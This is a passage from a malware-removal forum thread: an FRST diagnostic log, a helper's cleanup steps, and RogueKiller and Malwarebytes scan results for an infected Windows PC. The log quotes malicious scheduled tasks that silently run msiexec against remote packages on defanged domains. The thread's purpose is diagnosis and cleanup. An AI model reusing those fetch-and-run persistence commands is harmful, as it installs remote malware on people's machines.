    Task: {9711D794-1AC7-4767-9653-E265DA25924D} - System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C} => C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe [1601-01-03] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
    Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
    Task: {A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2} - System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B} => "msiexec.exe" -q -i hxxps://refreshnerer711.info/vDgBc3c79u8.s27
    Task: {CE636CD2-BC9F-45B0-86B6-6533DEC76BA4} - System32\Tasks\hjuzju => "msiexec" -package hxxps://superdomain1709.info/hawbncj.mri /q
    Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
    Task: {EB684CE2-5E4F-4692-B7BC-796F32D5014C} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-02-08] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {FC33DBE7-C910-4F1C-B383-007FD7E6ABC7} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ==================== Loaded Modules (Whitelisted) ==============

    2015-09-10 13:08 - 2015-09-10 13:08 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
    2019-02-08 21:46 - 2019-02-07 20:09 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
    2015-09-10 13:08 - 2015-09-10 13:08 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002498808 _____ () C:\Windows\system32\CoreUIComponents.dll
    2015-07-10 11:19 - 2015-07-10 11:19 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-09-10 13:08 - 2015-09-10 13:08 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-07-10 11:13 - 2015-09-10 13:08 - 000210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
    2019-02-08 21:47 - 2017-12-12 11:35 - 000281600 _____ () C:\Program Files (x86)\Multitimer\Multitimer.exe
    2019-02-08 23:02 - 2019-02-06 10:00 - 002684400 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000156656 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\swiftshader\libegl.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libglesv2.dll
    2019-02-08 23:02 - 2019-02-06 10:00 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\libegl.dll
    2019-02-09 00:44 - 2019-02-09 00:44 - 001083392 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ () C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-09 00:44 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Thomazing!\AppData\Local\Temp\is-0ODST.tmp\itdownload.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-07-31 06:42 - 2019-02-08 21:46 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 texttotalk.org
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 technologievimy.com

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Control Panel\Desktop\\Wallpaper ->
    DNS Servers: Media is not connected to internet.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{34014409-F047-4511-8A51-E0086652B848}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{EE26B7B5-4F57-4DB5-8AAD-A1A7AEEA5CF8}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{2F9DA978-66F3-44BD-BE3B-F5490BFA7C57}] => (Allow) C:\Windows\rss\csrss.exe ()
    FirewallRules: [{11A88E17-3A04-4D89-B347-E025C0716D1A}] => (Allow) C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
    FirewallRules: [{76CDF517-F312-44A8-B7D6-E74702BA4382}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{3F615D37-89C0-45E6-842F-5EB82ECD2C76}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{D3020994-C154-42F4-93AA-C0B3C54504AB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{1DE617D9-CAAF-4865-88CC-8B52F2C6CE8C}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{47792053-3338-4A6F-AE9E-447B51B4287A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{0A843646-B083-4688-8D3B-A42EB241BEAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{9A85637C-ABF5-4BC7-8DBF-AEAC9B50890A}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{4F5E25DC-8146-46D7-B3C7-DAEBA3A90326}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{2B39C486-2C5E-45FF-B698-F6C65CB96345}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
    FirewallRules: [{456C25A6-8A05-4EC5-B99F-03BA6956BF72}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
    FirewallRules: [{92C0DFAF-0F89-4F63-A042-BBB6C7AEAE3C}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{D453C330-AB73-4D2F-AEDC-5ACC2FECD2EF}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
    FirewallRules: [{76C2B05D-59C7-4F00-A6FA-E3B3EC26DF57}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{A5393F9A-F08B-4AF7-8E8A-5552C87EB8A1}] => (Allow) C:\Windows\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
    FirewallRules: [{6A332DC7-031B-46F5-8EE9-4BC596EEC559}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

    ==================== Restore Points =========================

    ATTENTION: System Restore is disabled

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/09/2019 12:44:21 AM) (Source: MsiInstaller) (EventID: 11327) (User: DESKTOP-OHFLJFD)
    Description: Продукт: Microsoft.NET -- Ошибка 1327. Недопустимое устройство: G:\

    Error: (02/09/2019 12:42:30 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/09/2019 12:38:44 AM) (Source: Application Hang) (EventID: 1002) (User: )
    Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

    Process ID: 10e0

    Start Time: 01d4bfcbbc5e5969

    Termination Time: 4294967295

    Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe

    Report Id: f84380ae-2bbf-11e9-8d72-0026b664e783

    Faulting package full name:

    Faulting package-relative application ID:

    Error: (02/08/2019 11:15:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
    Description: The program Multitimer.exe version 1.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

    Process ID: 17e4

    Start Time: 01d4bfbec9052d5e

    Termination Time: 4294967295

    Application Path: C:\Program Files (x86)\Multitimer\Multitimer.exe

    Report Id: 5e394fbf-2bb4-11e9-8d71-0026b664e783

    Faulting package full name:

    Faulting package-relative application ID:

    Error: (02/08/2019 11:15:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-OHFLJFD)
    Description: Activation of app Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/08/2019 11:15:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10240.16425, time stamp: 0x55bec5f5
    Faulting module name: CoreUIComponents.dll, version: 0.0.0.0, time stamp: 0x55d2cdf8
    Exception code: 0xc0000005
    Fault offset: 0x0000000000061f8e
    Faulting process id: 0x13e8
    Faulting application start time: 0x01d4bfbf1ac83bd3
    Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    Faulting module path: C:\Windows\system32\CoreUIComponents.dll
    Report Id: 8f9dc01a-6d94-4173-94ac-714bb15ffaf6
    Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy
    Faulting package-relative application ID: App


    System errors:
    =============
    Error: (02/09/2019 12:42:30 AM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-OHFLJFD)
    Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.

    Error: (02/09/2019 12:42:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/09/2019 12:31:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Windows Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.

    Error: (02/09/2019 12:29:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
    Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_Session1 service to connect.

    Error: (02/09/2019 12:29:23 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The Sync Host_Session1 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

    Error: (02/08/2019 11:05:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
    Description: The NmU2M2EwMWU service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.


    Windows Defender:
    ===================================
    Date: 2019-02-08 22:58:52.037
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:28:36.285
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:22:31.668
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:08:55.987
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: System
    Process Name: Unknown
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    Date: 2019-02-08 22:00:18.323
    Description:
    Windows Defender has detected malware or other potentially unwanted software.
    For more information please see the following:
    http://go.microsoft.com/fwlink/?link...0&enterprise=0
    Name: HackTool:Win32/AutoKMS
    ID: 2147685180
    Severity: Medium
    Category: Tool
    Path: file:_C:\Users\Thomazing!\AppData\Local\Temp\Rar$EXa15208.40575\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd;file:_D:\Thomas' Backup (1-22-16)\Thomas Entena\Documents\Set-Up\windows 10\Gold_Snake_Portable_v10.1.8\KMSpico Portable\cert\installAll.cmd
    Detection Origin: Local machine
    Detection Type: Concrete
    Detection Source: Real-Time Protection
    Process Name: C:\Program Files\WinRAR\WinRAR.exe
    Signature Version: AV: 1.199.1615.0, AS: 1.199.1615.0, NIS: 114.1.0.0
    Engine Version: AM: 1.1.11701.0, NIS: 2.1.11502.0

    ==================== Memory info ===========================

    Processor: Pentium(R) Dual-Core CPU T4400 @ 2.20GHz
    Percentage of memory in use: 35%
    Total physical RAM: 8059.98 MB
    Available physical RAM: 5186.63 MB
    Total Virtual: 9979.98 MB
    Available Virtual: 6556.94 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:97.66 GB) (Free:80.22 GB) NTFS
    Drive e: (Abebi) (Fixed) (Total:125.81 GB) (Free:21.43 GB) NTFS

    \\?\Volume{134fa4c9-0000-0000-0000-100000000000}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 134FA4C9)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=97.7 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=125.8 GB) - (Type=0F Extended)

    ==================== End of Addition.txt ============================

  3. #3
    Join Date
    Dec 2007
    Location
    Daly City, CA
    Posts
    22,377
    Please observe the following rules:

    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer's behavior, good or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.



    ================================

    Uninstall the following unwanted programs:

    CloudNet
    DiskWMpower
    Multitimer


    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double-click on the downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Remove Selected.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.

    Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available through History -> Application logs. Please post its contents in your next reply.

    Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8/10 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • A copy of all logfiles is saved to C:\AdwCleaner.

    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

  4. #4
    Join Date
    Jul 2008
    Posts
    232
    Here:

    RogueKiller REPORT 1:

    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
    Switches : -refid 3

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
    [Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤



    RogueKiller REPORT 2:

    RogueKiller Anti-Malware V13.1.4.0 (x64) [Feb 4 2019] (Free) by Adlice Software
    mail : https://adlice.com/contact/
    Website : https://adlice.com/download/roguekiller/
    Operating System : Windows 10 (10.0.10240) 64 bits
    Started in : Normal mode
    User : Thomazing! [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Signatures : 20190204_072850, Driver : Loaded
    Mode : Standard Scan, Scan -- Date : 2019/02/09 08:00:39 (Duration : 00:12:46)
    Switches : -refid 3

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
    [Tr.Winmon (Malicious)] (file) WinmonProcessMonitor.sys -- C:\Windows\System32\drivers\WinmonProcessMonitor.sys -> Found

    ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

  5. #5
    Join Date
    Jul 2008
    Posts
    232
    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 2/9/19
    Scan Time: 12:07 PM
    Log File: 2ea0ec9e-2c20-11e9-a4d9-0026b664e783.json

    -Software Information-
    Version: 3.7.1.2839
    Components Version: 1.0.538
    Update Package Version: 1.0.9182
    License: Trial

    -System Information-
    OS: Windows 10 (Build 10240.16487)
    CPU: x64
    File System: NTFS
    User: DESKTOP-OHFLJFD\Thomazing!

    -Scan Summary-
    Scan Type: Threat Scan
    Scan Initiated By: Manual
    Result: Completed
    Objects Scanned: 255377
    Threats Detected: 264
    Threats Quarantined: 256
    Time Elapsed: 14 min, 31 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Detect
    PUM: Detect

    -Scan Details-
    Process: 2
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182

    Module: 2
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182

    Registry Key: 41
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{43DBA25B-CE5F-49A9-898C-47539A2F79EE}, Quarantined, [6124], [448845],1.0.9182
    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5255E603-D784-4BD0-89A8-EE3FBB6E0334}, Quarantined, [732], [512160],1.0.9182
